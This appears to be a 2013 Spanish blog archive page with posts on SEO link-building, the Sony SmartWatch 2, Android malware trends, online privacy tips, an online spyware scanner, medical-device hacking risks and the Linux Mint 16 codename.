La optimización externa, esto es tratar de que los motores de búsqueda consideren nuestro sitio como relevante para una búsqueda determinada. Para ello debe existir coherencia entre los contenidos internos de nuestra página y los del nicho de mercado en el que queremos posicionarnos.

Esto lo conseguimos identificando las palabras claves más importantes para el nicho de mercado al que queramos dirigirnos, y incluirlas en el título de nuestra web, así como en los diferentes artículos que publiquemos, tanto en los títulos como en el contenido.

Creación de enlaces entrantes desde otros blogs (backlinks)

La generación de enlaces entrantes es una de las mejores maneras de mejorar el posicionamiento y en consecuencia aparecer en las primeras páginas de los buscadores, lo que nos garantiza una buena cantidad de visitas.

Una forma de hacerlo es visitando los diferentes blogs que existan en nuestro mismo nicho de mercado y dejar comentarios sobre los artículos que se lean, utilizando para ello el espacio habilitado para dicho fin. No podemos olvidar dejar la dirección de nuestra web para generar un enlace entrante.

Participar en comunidades en línea y foros

Esta técnica es muy sencilla, ya que se trata de que entremos en los foros que tratan sobre asuntos relacionados con nuestra web y allí participamos en los comentarios incluyendo un enlace hacia nuestro sitio en la firma al pie de cada uno de sus mensajes para permitir que los lectores accedan a nuestro sitio igual que hacíamos en los blogs.

También podemos compartir nuestros conocimientos y experiencia en alguna de las comunidades en línea, sin olvidarnos de dejar nuestra dirección. Así podremos conseguir publicidad gratuita cuando entremos en foros que tratan del mismo tema de nuestro nicho.

Esta estrategia no lleva demasiado tiempo una vez que hayamos encontrado unos cuantos foros para participar ya sea en google o en yahoo.

Y si no encontramos un foro sobre nuestro tema no debemos tener miedo en iniciarlo nosotros mismos.


Creación de articulos
Se trata de escribir un artículo de texto de entre 350 y 750 palabras relacionado con el tema de nuestro blog, o de los productos que estamos promocionando. Incluimos una caja de recursos al final del mismo con nuestros datos y un enlace hacia nuestro sitio.

Además de publicarlo en nuestro blog, podemos enviar dicho artículo a todos los directorios de artículos y editores de boletines electrónicos que nos sea posible para multiplicar las posibilidades de que nos lean.

Debemos escribir sobre algo en lo que tengamos experiencia y que al leerlo, se noten nuestros conocimientos sobre el tema así los visitantes estarán ansiosos por ir a nuestro sitio cada vez que escribamos otro artículo.

Los artículos deben ser de buena calidad, tratar sobre los temas de nuestro nicho que pueden preocupar a nuestros visitantes y dar una solución, de forma que vuelvan a menudo para leer nuestros sabios consejos.

Hacer un boletín de noticias.

Tener nuestro propio boletín de noticias donde ofrecemos consejos gratis y contenido de forma regular puede ayudar a aumentar el tráfico a nuestro sitio web.

El boletín de noticias tendrá un enlace a nuestra web, así que la gente que leer el boletín de noticias también puede visitar nuestro blog.

Redes Sociales



Las redes sociales, sobre todo Twitter y Facebook, han experimentado un auge extraordinario en los últimos tiempos y las previsiones son que su importancia aumente en los próximos años, de tal manera que millones de personas están constantemente conectados siguiendo los comentarios de estos microblogs.

Y es este el hecho que nos importa a la hora de hablar de tráfico a nuestro blog, ya que con cada mensaje subido a esta redes sociales podemos añadir enlaces hacia nuestra página o recomendar un artículo o producto.

Sony SmartWatch 2: la renovación del reloj inteligente

Sony SmartWatch 2: la renovación del reloj inteligente


Sony sigue apostando por el SmartWatch y ahora han sacado la segunda versión de su reloj electrónico, el Sony SmartWatch 2. Parece que no este dispositivo no era una prueba y Sony va en serio. Todorecuerda a la actual gama Xperia Z, con un diseño parecido y con el gran botón que encontramos en los teléfonos como elemento diferenciador.



La pantalla tiene un tamaño de 1.6 pulgadas y una resolución de 220x176. El original tenía 1.3 pulgadas y una resolución de 128x128 con lo que la mejora debería ser sustancial. La tecnología de pantalla pasa de ser OLED a ser un LCD Transflectivo lo que le debería dar mayor visibilidad en exteriores. Sigue siendo totalmente táctil y tenemos una duración de batería de entre 3 y 4 días.

La carga se realiza desde un puerto MicroUSB estándar y tiene certificación IP 57, lo que quiere decir que soporta salpicaduras pero no una inmersión total y prolongada. La gran novedad es la inclusión de NFC, lo que le permitiría juntarse con un teléfono.

Algo importante y que decidirá si vale la pena el producto es el software que lleva y como responde al uso. En este caso nos olvidamos de Android ya que el SmartWatch 2 no funciona con el sistema operativo de Google pero será compatible con la mayoría de teléfonos Android. Incorpora aplicaciones como la respuesta y cancelación de llamadas, registro de llamadas, SMS, email, Facebook, Twitter, calendario y alertas de tiempo. También tiene una aplicación de música y un lector de feeds online.

Las aplicaciones se descargarán en el teléfono y se pasarán al reloj mediante Bluetooth. Sony dice que de momento hay 200 aplicaciones disponibles así que veremos como funciona esta tienda de apps. Veremos si el futuro de este reloj es prometedor. El precio será un factor importante al igual que la usabilidad de todo el conjunto y la visibilidad de la pantalla en exteriores. Si todo esto funciona podrá competir con el Pebble y similares, que ofrecen una pantalla monocroma.

¿Por que ha crecido el malware en Android en lo que va del 2013?.

¿Por que ha crecido el malware en Android en lo que va del 2013?.
 
 
Ya bastante que he comentado sobre el malware en los equipos de escritorio, pero nada se compara con la evolución del malware en los dispositivos móviles. Como siempre he dicho, “esto es para vivirlo y no que te lo cuenten”, mi antiguo dispositivo móvil tenia un sistema operativo basado en Linux que déjenme decirles hacia todo y más, flexible, rápido y seguro, que más se le puede pedir, la batería duraba unos 5 días, en ocasiones más, pequeño y funcional, en resumen, era un buen teléfono y no como ahora que son cámaras o tabletas pequeñas que también sirven para hablar aunque si hablas mucho o haces muchas cosas, te quedas sin batería a final del día.
 
Anteriormente comentaba sobre el malware para Android viendo los toros detrás de la barrera, pero por cosas de la vida, mi teléfono se daño y no por ser malo sino por accidentes de la vida y venia el dilema, ¿que comprar ahora?, las opciones eran muy claras para mi en particular sin desmeritar otras marcas, pero pasaba por Motorola o HTC y como toda mi vida he tenido teléfonos Motorola, decidí probar con HTC.
 
En un principio no podía hacer todo lo que hacia mi antiguo Motorola pero poco a poco me las he arreglado para hacerlo con mi nuevo HTC que debo reconocer que es mucho más rápido y seria el colmo con el procesador que trae y la memoria tanto interna como externa. Al buscar aplicaciones para hacer lo que hacia mi antiguo teléfono de fabrica, me di cuenta el por que el malware prolifera tanto en Android aunque Apple no está muy sano que digamos.
 
El malware en los dispositivos móviles
- Las aplicaciones maliciosas han aumentado un 3.500% en lo que va de 2013.
- El sistema operativo de Google, Android, sigue siendo el principal objetivo de éstas.
- Los dispositivos de Apple también se han convertido en objetivo de ciber delincuentes.
 
En apenas una semana con mi nuevo terminal, ya he visto cerca de 6.000 aplicaciones distintas y estoy seguro que hay muchas más, cosa que hace posible la infección de malware de mi terminal si me descuido e instalo indiscriminadamente cualquier aplicación ya que son muy fácil de manipular en su formato de origen (apk) tanto es así que yo mismo modifique una para que hiciera las cosas como yo quería, basta con solo abrir el archivo con WinRAR, WinZIP, 7-Zip o cualquier otro compresor y verán el código fuente que puede ser modificado con solo tener un mediano conocimiento de programación.
 
    Las aplicaciones malware (maliciosas) diseñadas por ciber delincuentes para contagiar dispositivos móviles han aumentado un 3.500% en lo que va de 2013, lo que supone un riesgo en la privacidad del usuario, según un informe presentado por una empresa de seguridad.
 
Los ciber delincuentes crean este tipo de programas maliciosos para robar al usuario a través de aplicaciones bancarias y mensajes SMS con tarifas especiales.
 
Más del 90% de las nuevas muestras de malware descubiertas están especialmente creadas para afectar al sistema operativo de Google, debido al gran número de usuarios que ha adquirido dispositivos Android y Apple, según el citado informe.
 
Es muy común que cualquier usuario cuente con un smartphone o una tableta para acceder a la red, por lo que este tipo de dispositivos se han convertido en un nuevo objetivo para los delincuentes.

Vías de infección

Las vías que ocasionan esta infección en los móviles especialmente para Android, se dan a través de instalación de aplicaciones maliciosas, mediante páginas web logrando que el usuario descargue "malware" sin darse cuenta, incluso con la conexión de Wi-Fi no segura, ya que expone su información confidencial.
 
Una solución aunque no es 100% efectiva es que los usuarios que instalen solo aplicaciones fiables, cuando se utilice conexión con Wi-Fi no realizar trámites importantes como transacciones o mantener actualizado el sistema operativo.
 
Activar la opción de “aplicaciones de origen desconocido” así como permite instalar aplicaciones que son interesantes, también puede permitir la entrada a malware en nuestro dispositivo.
 
Ya se encuentran en el mercado una infinidad de antivirus para dispositivos móviles que prometen resolver el problema de la seguridad y aunque no voy a polemizar respecto a ello, cuantos de ustedes no han tenido problemas con su PC a causa de un malware teniendo un antivirus instalado, ¿acaso con los dispositivos móviles la cosa es diferente?.
 
Después de dicho todo lo anterior, vale decir que al igual que con los equipos de escritorio, estar bien informado y usar el sentido común son las mejores herramientas para evitar que nuestro terminal sea infectado.
 

lunes, 24 de junio de 2013

Cómo proteger tu privacidad online en tres sencillos pasos

Cómo proteger tu privacidad online en tres sencillos pasos



Así funciona el sistema secreto de espionaje de EEUU sobre Internet

Va camino de convertirse en uno de los escándalos de espionaje más sonados de EEUU y seguro que tendrá consecuencias en mucho países. El Washington… Leer más…

Los recientes casos de espionaje a medio mundo por parte de los servicios secretos estadounidenses ponen de manifiesto algo que a menudo se nos olvida: Nos preocupamos muy poco de nuestra privacidad. A continuación os ofrecemos tres consejos muy sencillos para estar un poco mejor cubiertos en internet.

No os aseguramos que estos consejos os vuelvan completamente invisibles ni mucho menos, pero les pondrán las cosas más difíciles a los curiosos, ya sean cibercriminales, o agentes gubernamentales con curiosidad por la vida privada de otros.
Cifrado



Cifrar tus discos duros es una excelente medida para empezar. No se necesitan conocimientos de cifrado ni nada por el estilo. Tanto OSX como Windows ofrecen herramientas propias de cifrado. La de OSX se llama Filevault y puede encontrarse en la pestaña Seguridad de los ordenadores Mac.

La de Windows, por su parte, es la popular Bitlocker a cuyo menú de configuración se accede desde el icono Sistema y seguridad.

Para los que quieran seguridad adicional o no se fíen de las soluciones de compañías sospechosas de colaborar con el sistema, TrueCrypt o DiskCryptor son dos buenas alternativas gratuitas.
Navegar seguro

SEXPANDIR

Google guarda registros de las búsquedas, y eso hace que sea fácil para los gobiernos examinar ese rastro de migas de pan. Si podéis vivir sin Google, la mejor alternativa es DuckDuckGo, un buscador alternativo que no deja huellas.

Lo ideal, para navegar, es configurar una red privada virtual o VPN. Es posible crear una VPN en Windows desde el menú Conectarse a un área de trabajo que aparece al pulsar sobre Configurar una nueva conexión de red.

La opción más segura, pero también la más complicada de configurar, es configurar el acceso a través de una red cifrada como Tor. Lamentablemente, este proceso no es tan sencillo para un usuario sin conocimientos.
Usar el sentido común



No estar continuamente registrados en páginas web si no vamos a usarlas, no introducir nuestros datos en ordenadores públicos, o configurar correctamente los niveles de seguridad en Facebook son sólo algunas medidas que tenemos que aplicarnos si queremos no ser presa fácil de miradas curiosas. Para acceder a la pestaña seguridad basta pulsar sobre el icono de configuración de cuenta de la parte superior derecha.

La última medida es sencilla y a la vez complicada. Si no queréis que ojos ajenos acaben viendo lo que publicáis, sencillamente no lo publiquéis. Somos conscientes de que vivimos en un mundo en el que a todos nos gusta ser el centro de atención en redes sociales, pero la intimidad es la intimidad, y lo mejor para evitar que se sepa algo es empezar por no contarlo.

Elimina los spyware de manera Online con SUPERAntiSpyware.

Elimina los spyware de manera Online con  SUPERAntiSpyware.
 
SUPERAntiSpyware SUPERAntiSpyware ahora en versión online para eliminar spyware

Ya con anterioridad he comentado sobre los antivirus Online y como son una buena alternativa a la hora de evaluar si nuestro sistema está comprometido por alguna clase de malware. Pues bien, los spyware se han convertido desde hace tiempo en una seria amenaza por lo que proteger nuestro sistema en su contra es más que recomendado.
Poca presentación precisa una herramienta tan práctica y antigua como SUPERAntiSpyware, sin duda una de las mejores opciones para limpiar nuestro PC de malware, spyware y todo tipo de archivos maliciosos. La novedad es que esta solución ahora también está disponible online, por lo que no necesitamos instalarla en nuestro equipo.

En realidad si que es necesario descargar un archivo a nuestro equipo, pero no es necesario instalarlo/desinstalarlo ni crea ninguna carpeta dentro de ‘Archivos de programa’. Solo hay que ejecutarlo, con un doble clic, y examinar nuestro disco duro en busca de todo tipo de bichos, para lo que nos apoyamos en la base de datos online de la aplicación capaz de detectar más de un millón de infecciones provocadas por spyware o malware.

Al ejecutarlo nos pide que especifiquemos un idioma, pudiendo elegir el español que está en el listado, y luego se nos muestra la interfaz clásica de esta aplicación que es sumamente fácil de manejar. Se trata de una gran solución para complementar a nuestro antivirus habitual, para probarlo solo tienen que hacer clic en el siguiente enlace:http://www.superantispyware.com/onlinescan.html
 
Más información:
 

domingo, 23 de junio de 2013

El cuerpo humano es el próximo objetivo de los ciberpiratas

El cuerpo humano es el próximo objetivo de los ciberpiratas
22 junio 2013

¿

Piratear aparatos médicos? No es pura ficción y los expertos estadounidenses opinan que la amenaza es seria, con objetivos que van desde los marcapasos a la bomba de insulina, y que sus consecuencias pueden ser mortales.



La Food and Drug Administration (FDA), organismo encargado de la seguridad de alimentos y medicamentos enEstados Unidos acaba de recomendar una mayor vigilancia a los fabricantes.

Esta preocupada por las "vulnerabilidades" en materia de ciberseguridad que podrían afectar directamente a los aparatos médicos o a las redes de los hospitales.

El escenario futuro ya fue contemplado en la televisión: en la serie "Homeland" asesinan alvicepresidente de Estados Unidos interviniendo en su marcapasos y desencadenando un choque eléctrico letal.

"La buena noticia es que no tenemos conocimiento de ningún accidente en el mundo real. Pero la mala noticia es que no hay nadie científicamente interesado en el tema", comenta Kevin Fu, profesor de informática de la universidad de Michigan, especializado en el ámbito de la salud. Un virus informático puede contagiarse en un santiamén", señala.

Kevin Fu es coautor de un estudio de 2008, que destacaba los riesgos de artefactos implantados en el cuerpo humano, como los desfibriladores cardíacos, ya que los piratas pueden reprogramarlos infiltrándose en las redes inalámbricas que sirven para dirigirlos.

Para él, sin embargo, "el mayor riesgo es un virus que entre por accidente en un aparato médico antes que los ataques imaginados en la ficción".

"Los virus enlentecen a menudo los ordenadores, y cuando usted enlentece un aparato médico, ya no tiene la integridad necesaria para funcionar como debería", explica.

Según Barnaby Jack, experto de la compañía de seguridad IOActive, el escenario descrito en "Homeland" es "totalmente realista". Dice que quiere hacer una presentación de un ataque similar durante un próximo foro de hackers.

Barnaby Jack estudió los marcapasos y los desfibriladores cardíacos implantables de un importante fabricante y los encontró "particularmente vulnerables". Desde una distancia de 10 a 15 metros, "puedo recuperar los códigos necesarios para interrogar los implantes individuales a distancia", afirma.

Otro experto en seguridad informática, Jay Radcliffe, él mismo diabético, demostró en 2011 que era posible piratear una bomba de insulina y modificarle las dosis.

Al margen de los aparatos implantables, muchos equipos hospitalarios (monitores cardíacos, scanners, respiradores artificiales, aparatos de radioterapia o mezcladores de productos que se introducen por vía intravenosa) están conectados a redes, a veces inalámbricas, cuya seguridad puede presentar fallas.

Sus contraseñas también pueden ser pirateadas. La empresa de seguridad Cylancepublicó recientemente una lista de ellas. "Hubiéramos podido publicar 1.000, o llegado incluso hasta las 10.000. Nos detuvimos en las 300 porque eran suficientes para enviar el mensaje", comentó Cylance en su blog.

"Las posibilidades de un ataque contra el aparato médico de alguien es extremadamente baja", relativiza no obstante Barnaby Jack.

"Cualquier riesgo, por reducido que sea, debe ser suprimido", opina, y espera que la llamada de atención sobre el problema empujará a los fabricantes a mejorar la seguridad de los aparatos.

"La mayoría de los problemas de seguridad pueden ser rastreados desde la concepción" del aparato, asegura Kevin Fu, quien dice tener "dudas acerca de la eficacia de una estrategia basada únicamente en los antivirus".

Linux Mint 16 ya tiene nombre en clave: “Petra”.

Linux Mint 16 ya tiene nombre en clave: “Petra”.



Linux Mint 16 ya tiene nombre en clave: “Petra”. Al margen del significado etimológico del término (Petra viene del griego πέτρα y significa piedra), y de la bella ciudad jordana del mismo nombre, Petra me recuerda, no sé por qué, a un ama de cría de mediana edad y proporciones generosas, con trenzas rubias y carrillos rosados (sin ánimo de ofender a ninguna dama agraciada con el mismo nombre, que conste).

Clement Lefebre, autor del anuncio, justifica el sonoro nombre en clave por la primera acepción. No es difícil asociar en este caso, cierta intención respecto de la robustez con la que el equipo de desarrollo quiere dotar a la próxima entrega de Mint.

Linux Mint, un proyecto con solvencia
El trabajo está en esa dirección visto el resultado de Olivia, la actual versión aparecida a finales de Mayo. Linux Mint 15 ha supuesto un salto de calidad que sitúa a la distribución como una de las mejores ofertas del panorama Linux en el presente.

Hasta aquí todo bien si Petra fuera una continuidad de Olivia, pero no es así, al menos en parte. Endeclaraciones exclusivas ofrecidas a Linux User, Lefebre ha dicho que en Cinnamon 2.0 no estarás ejecutando GNOME para nada, sin revelar más detalles. Probablemente se refiere a GNOME 3, porque sobre Mate no ha comentado nada.

El debut de Linux Mint 16 “Petra” se ha anunciado para finales de noviembre, junto con los entornos de escritorio Cinnamon (supuestamente la versión 2.0 sin GNOME 3 debajo), MATE, KDE yXfce. No hay más en el anuncio, tampoco noticias sobre la rama Debian de Mint, LMDE.

En algún momento Lefebre revelará que hay detrás de su contundente afirmación sobre el abandono de GNOME 3. Confío en que el cambio no sea un error, porque lo cierto es que mientras Canonical da la impresión de preocuparse más del mundo móvil que del escritorio en este momento, los chicos de Mint están haciendo un buen trabajo, ganando muchos adeptos.

No me extraña que mi compañero LosLunesAlSol recomendara Mint como alternativa altodopoderoso Windows XP. La recomendación fue hecha en abril, cuando Olivia estaba aún en desarrollo. De haber escrito el artículo después de mayo, tal vez Mint 15 no fuera una alternativa, sino “la alternativa”. Lo mejor es probarla.